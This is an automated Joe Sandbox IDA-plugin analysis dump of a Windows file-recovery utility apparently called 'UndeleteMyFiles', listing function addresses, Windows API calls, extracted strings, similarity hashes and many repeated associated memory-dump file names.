Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: lstrlenwsprintf$EnableWindow__wcsnicmp
String ID: %d - on %s$Total files match search criteria: %d$UndeleteMyFiles$h#I
API String ID: 2801652419-1451265571
Opcode ID: d1df5039d1c0efefcf6006eced7a46851c415bd6cd2194576a2ccba4c409daef
Instruction ID: b1cdb2d0480dd038af02aa5a12312f5c95aaaba23de7a1bb0db8e8ea606c1fa8
Opcode Fuzzy Hash: d1df5039d1c0efefcf6006eced7a46851c415bd6cd2194576a2ccba4c409daef
Instruction Fuzzy Hash: 6E318274900158EBDB24DF54CD95BE9B3B1FB48304F0081EAE549A7281DBB86EC4DF59

Function 0043E670 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

SHBrowseForFolderW.SHELL32(?), ref: 0043E6C1
SHGetPathFromIDListW.SHELL32(00000000,004A243C), ref: 0043E6DD
SHGetMalloc.SHELL32(?), ref: 0043E6FD

Strings

Invalid folder name., xrefs: 0043E73C
P, xrefs: 0043E6B6
UndeleteMyFiles, xrefs: 0043E737

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: BrowseFolderFromListMallocPath
String ID: Invalid folder name.$P$UndeleteMyFiles
API String ID: 2332185071-3959326079
Opcode ID: c0828669fc7b21637f6d5c522bbe1a24389b28e86b28e71102f654692727c05d
Instruction ID: 16531ae5ca95af856371079f0919770ca752d31a8afc4a060b5cb483db483c18
Opcode Fuzzy Hash: c0828669fc7b21637f6d5c522bbe1a24389b28e86b28e71102f654692727c05d
Instruction Fuzzy Hash: 13210874A01218DFCB05DFA5D984BDEB7F4BB4C304F5084A9E505AB390DBB4AA84CF69

Function 00450760 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64stringCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000010), ref: 00450780
lstrcmpiW.KERNEL32(?,edit), ref: 0045079F
lstrcmpiW.KERNEL32(?,button), ref: 004507CA
GetWindowLongW.USER32(?,000000F0), ref: 004507DA
GetDlgCtrlID.USER32(?), ref: 004507EB

Strings

button, xrefs: 004507C1
edit, xrefs: 00450796

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: lstrcmpi$ClassCtrlLongNameWindow
String ID: button$edit
API String ID: 3255865568-758777758
Opcode ID: 3b16b70202e68b5b14f6ddadd45e96886e94cba750c70257643d86fe729bb448
Instruction ID: bfa402a799bc0f006c7047df278fc7f5f36fe1fdcd632c12320ddaaf26b30c84
Opcode Fuzzy Hash: 3b16b70202e68b5b14f6ddadd45e96886e94cba750c70257643d86fe729bb448
Instruction Fuzzy Hash: 1E213178A00208EFCB04DFA9D588BDD77B5FB08305F14816AE8059B281E774AE85DF58

Function 00414FB2 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00414FB9
GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 00415005
GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 00415017

Strings

DragMinDist, xrefs: 00414FFA
windows, xrefs: 00414FFF, 00415004, 00415011
DragDelay, xrefs: 0041500C
@G, xrefs: 00414FD0

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Profile$H_prolog3
String ID: @G$DragDelay$DragMinDist$windows
API String ID: 2233939352-2305506790
Opcode ID: d58a071f239c7a769a97396a81efaebf0bbbe72ba212d0e5fdeddf7e4f126649
Instruction ID: 41298c944f661f1a0933e7bf6f9a7e7bd4ace06afdddc316c777422316acbfdb
Opcode Fuzzy Hash: d58a071f239c7a769a97396a81efaebf0bbbe72ba212d0e5fdeddf7e4f126649
Instruction Fuzzy Hash: EAF086B0A41700DFDB609F669D41749B6E4BF94704F90882FE1446B2A1DBF86540CB4D

Function 0041032F Relevance: 10.6, APIs: 7, Instructions: 117windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00410362
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00410386
UpdateWindow.USER32(?), ref: 004103A1
SendMessageW.USER32(?,00000121,00000000,?), ref: 004103C2
SendMessageW.USER32(?,0000036A,00000000,00000002), ref: 004103DA
UpdateWindow.USER32(?), ref: 0041041D
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0041044E

Part of subcall function 004136CF: GetWindowLongW.USER32(?,000000F0), ref: 004136DA

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 8f7bba986d37758b5ee4bbbb7e492cb8b2dd5eb627375ecc81eab71f4c274bb6
Instruction ID: a14a362a9228a7a8e40436cc717c2602955345991c5074d1a73f66ec07201da9
Opcode Fuzzy Hash: 8f7bba986d37758b5ee4bbbb7e492cb8b2dd5eb627375ecc81eab71f4c274bb6
Instruction Fuzzy Hash: 24418470900649EBCB219F66CC84EEFBBB4FF80705F10812FE451A6291E7B989C1DB19

Function 004592C5 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 111windowCOMMON

Download Yara Rule

APIs

swprintf.LIBCMT ref: 00459368

Part of subcall function 00428C03: __vswprintf_s_l.LIBCMT ref: 00428C17

Part of subcall function 00403370: EnterCriticalSection.KERNEL32(?), ref: 0040337E
Part of subcall function 00403370: LeaveCriticalSection.KERNEL32(?), ref: 004033AD

Part of subcall function 00403440: EnterCriticalSection.KERNEL32(?), ref: 0040344E
Part of subcall function 00403440: lstrcpyW.KERNEL32(?,?), ref: 0040345F
Part of subcall function 00403440: LeaveCriticalSection.KERNEL32(?), ref: 0040346C

Part of subcall function 00403480: EnterCriticalSection.KERNEL32(?), ref: 0040348E
Part of subcall function 00403480: lstrcpyW.KERNEL32(?,?), ref: 004034A2
Part of subcall function 00403480: LeaveCriticalSection.KERNEL32(?), ref: 004034AF

swprintf.LIBCMT ref: 00459456
MessageBoxW.USER32(00000000,?,Warning!,00000002), ref: 0045947B
swprintf.LIBCMT ref: 004595EF
GetFileAttributesW.KERNEL32(?), ref: 004596A5
SetFileAttributesW.KERNEL32(?,?), ref: 004596C2

Part of subcall function 00403330: EnterCriticalSection.KERNEL32(?), ref: 00403340
Part of subcall function 00403330: LeaveCriticalSection.KERNEL32(?), ref: 00403355

Strings

%lu/%lu (%.1f%%), xrefs: 00459357
Warning!, xrefs: 00459460
Can't wipe file: %s, xrefs: 00459445

Memory Dump Source

Source File: 00000000.00000002.2367538030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2367488648.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367709680.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367730398.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367784217.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367800166.000000000048E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367815740.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000058D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005A6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000605000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000065A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000703000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000707000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000830000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000008DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000092E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.000000000098F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000A7D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B0A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000B19000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D7C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2367874759.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_fXg8zgxVTF.jbxd

Similarity

API ID: CriticalSection$EnterLeave$swprintf$AttributesFilelstrcpy$Message__vswprintf_s_l
String ID: %lu/%lu (%.1f%%)$Can't wipe file: %s$Warning!
API String ID: 312963551-1783262251
Opcode ID: 6ad85c91b274b43379163761265e61eee04593134fd43d47db921ebbd9051a30
Instruction ID: 9733bdd256407d8181b196c4c79e2ebefb8dff95d6eeaad7e9320640931a8420
Opcode Fuzzy Hash: 6ad85c91b274b43379163761265e61eee04593134fd43d47db921ebbd9051a30
Instruction Fuzzy Hash: 0E515A74E05228DBCB54EF21CC99B9DB3B5BB48305F1085EEE40967292EB745E88CF54

Function 0041098A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

